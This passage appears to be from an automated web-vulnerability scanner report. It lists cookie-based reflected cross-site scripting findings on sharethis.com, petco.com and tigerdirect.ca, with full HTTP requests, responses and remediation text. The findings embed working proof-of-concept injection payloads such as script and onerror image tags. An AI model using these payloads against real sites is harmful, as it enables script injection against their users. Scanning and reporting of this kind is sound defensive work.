Cookie: GeekVisit=1; GeekToday=9%2F30%2F2011; ASPSESSIONIDCCDDQATS=HPFJGLMCCOLGCDFFDCHEDMCK; __utmx=61335981.00002385853812274871:1:0-0-0; __utmxx=61335981.00002385853812274871:1317385500:2592000; __utma=61335981.1126012844.1317385504.1317385504.1317385504.1; __utmb=61335981; __utmc=61335981; __utmz=61335981.1317385504.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 30 Sep 2011 13:43:54 GMT
X-Powered-By: ASP.NET
Content-Length: 79264
Content-Type: text/html
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="Cont
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=1e58b--><script>alert(1)</script>8dfeb600483-->
...[SNIP]...

3.469. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 41e8a<script>alert(1)</script>f52776f8ebc was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.toshibadirect.com%2Ftd%2Fb2c%2Flaptops.to%3Fpage%3DsegHHO&jsref=http%3A%2F%2Fwww.mcafeesecure.com%2Fus%2Fforconsumers%2Fmcafee_certified_sites.jsp&rnd=1317384179973 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==41e8a<script>alert(1)</script>f52776f8ebc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Fri, 30 Sep 2011 12:03:08 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1376


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CqCKBE5ezzUzVT7FCnHuAg==41e8a<script>alert(1)</script>f52776f8ebc
userid:
</div>
...[SNIP]...

3.470. http://www.petco.com/ [ResonanceSegment cookie]  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.petco.com
Path:   /

Issue detail

The value of the ResonanceSegment cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b1aa(a)f737fdc7eba was submitted in the ResonanceSegment cookie. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VisitHistory=LastDirectVisitDate=9/9/2011 7:11:57 AM; RES_TRACKINGID=792905017500743; SL_Audience=758|Accelerated|419|1|0; CartIDs=DCD45CED67585A28C9FA737005E4871E=D; bvrecent={"bvrecent":["3370"]}; ResonanceSegment=38b1aa(a)f737fdc7eba; __utma=215766422.824288884.1315595557.1315595557.1315595557.1; __utmz=215766422.1315595557.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=215766422.SL_TS_Accelerated; mt.v=1.685030856.1315595557741; SAVId=vid%3DUCbVg8v1BpXo645cD7T3MPSj6wgpMAy7%3Bnvid%3D0%3Bcvid%3D1%3Bglen%3D249%3Bgid%3D86ef9061944bfa75305642e22f634198%3Bgdx%3D249%3Bpt%3D0%3B

Response (redirected)

HTTP/1.1 200 OK
P3P: CP="ALL DSP COR IVDi PSD PSA TELi TAIi ADM CUR CONi SAMi OUR IND PHY ONL UNI PUR COM NAV INT CNT PRE"
Location: http://www.petco.com:80/Default.aspx?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
Cache-Control: private
Content-Type: text/html; charset=utf-8
X-SL-CompState: Uncompiled
X-Strangeloop: ViewState,Compression
Content-Length: 66434
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 12:08:10 GMT
Connection: close
Set-Cookie: MP=CJ=1&CJExpiry=11/4/2011 5:07:17 AM&CJ_AFFILIATEENTEREDDATE=9/30/2011 5:07:17 AM; domain=.petco.com; expires=Thu, 29-Dec-2011 13:07:17 GMT; path=/
Set-Cookie: Basket=AffiliateCJExpiryDate=11/4/2011 5:07:17 AM&PID=2537521&AID=10413444; domain=.petco.com; expires=Fri, 30-Dec-2011 13:07:17 GMT; path=/
Set-Cookie: SL_UVId=29561E4A80BD9A46;path=/;


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotoc
...[SNIP]...
<script type='text/javascript'>var certonaSegment = 38b1aa(a)f737fdc7eba;var resx = new Object();resx.appid='petco01';resx.top1=33333;resx.top2=66666;resx.top3=100000;resx.lkmatch=/product\/\d+|sku%3D\d+/i;resx.rrelem='home_rr';resx.customerid='792905017500743';</script>
...[SNIP]...

3.471. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [90215357_clogin cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the 90215357_clogin cookie is copied into an HTML comment. The payload f02e5--><img%20src%3da%20onerror%3dalert(1)>8fc7fd52c57 was submitted in the 90215357_clogin cookie. This input was echoed as f02e5--><img src=a onerror=alert(1)>8fc7fd52c57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326f02e5--><img%20src%3da%20onerror%3dalert(1)>8fc7fd52c57; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:14 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&ProductTotal=79%2E98&Referer=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&rNavLastVisit=&TotalItems=1&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E; path=/
Set-Cookie: DB=msRandX=44f58df%2D%2D%3E%3Ca%3E54e3302b76&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 75996


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--90215357_clogin(e) :1317387389326f02e5--><img src=a onerror=alert(1)>8fc7fd52c57-->
...[SNIP]...

3.472. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [Cart cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload ff285--><img%20src%3da%20onerror%3dalert(1)>0832286a0ca was submitted in the Cart cookie. This input was echoed as ff285--><img src=a onerror=alert(1)>0832286a0ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=ff285--><img%20src%3da%20onerror%3dalert(1)>0832286a0ca; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:25:51 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA02A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANW; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44a4be4dd28947e8b83bdb940; path=/
Set-Cookie: SRVR=WEBX13%2D02A; path=/
Vary: Accept-Encoding
Content-Length: 75513


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--Cart(Referer) :ff285--><img src=a onerror=alert(1)>0832286a0ca-->
...[SNIP]...

3.473. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CartId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the CartId cookie is copied into an HTML comment. The payload d2bce--><img%20src%3da%20onerror%3dalert(1)>7b065e5aadc was submitted in the CartId cookie. This input was echoed as d2bce--><img src=a onerror=alert(1)>7b065e5aadc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51d2bce--><img%20src%3da%20onerror%3dalert(1)>7b065e5aadc; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:29 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=e1335%2D%2D%3E%3Ca%3Ecd06cbb4f15; path=/
Set-Cookie: DB=msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Vary: Accept-Encoding
Content-Length: 75998


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--CartId :B9EF64C0-02C9-4EE6-8D81-FED18276FD51d2bce--><img src=a onerror=alert(1)>7b065e5aadc-->
...[SNIP]...

3.474. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CartSave cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the CartSave cookie is copied into an HTML comment. The payload 92569--><img%20src%3da%20onerror%3dalert(1)>2ebad211352 was submitted in the CartSave cookie. This input was echoed as 92569--><img src=a onerror=alert(1)>2ebad211352 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /applications/searchtools/item_upsell.asp?EdpNo=1104495&msg= HTTP/1.1
Host: www.tigerdirect.ca
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tigerdirect.ca/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Sidenav=B&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=44; SRVR=WEBX13%2D02A; Cart=rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=; beta=Y; SessionId=4304010201109300823205023123106; CoreID6=06191880977413173855893&ci=90215357; 90215357_clogin=l=1317385589&v=7&e=1317387389326; CoreAt=90215357=1|0|0|0|0|0|0|0|0|0|0|0|1|1317385589||&; CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51; SRCCODE=CANW; CartSave=CartId=B9EF64C0%2D02C9%2D4EE6%2D8D81%2DFED18276FD51&Cart=292569--><img%20src%3da%20onerror%3dalert(1)>2ebad211352

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:26:37 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA04A
X-Powered-By: ASP.NET
Set-Cookie: Warranty=POPPED; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Findexca%2Easp&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17&Referer=1257c%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e9da63568fc4; path=/
Set-Cookie: DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4472f62%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E423e7fc100a; path=/
Set-Cookie: SRVR=WEBX14%2D04A; path=/
Vary: Accept-Encoding
Content-Length: 76040


<!--v1-->
<!--Domain :: tigerdirect.ca-->
<!--imageHost :: http://images.highspeedbackbone.net-->
<!--BaseURL :: www.tigerdirect.ca-->
<!--ContinueShoppingURL :: http://www.tigerdirect.ca/-->
<
...[SNIP]...
<!--CartSave(Cart) :292569--><img src=a onerror=alert(1)>2ebad211352-->
...[SNIP]...

3.475. http://www.tigerdirect.ca/applications/searchtools/item_upsell.asp [CoreAt cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /applications/searchtools/item_upsell.asp

Issue detail

The value of the CoreAt cookie is copied into an HTML comment. The payload e5754--><img%20src%3da%20onerror%3dalert(1)>1cee4e52eea was submitted in the CoreAt cookie. This input was echoed as e5754--><img src=a onerror=alert(1)>1cee4e52eea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

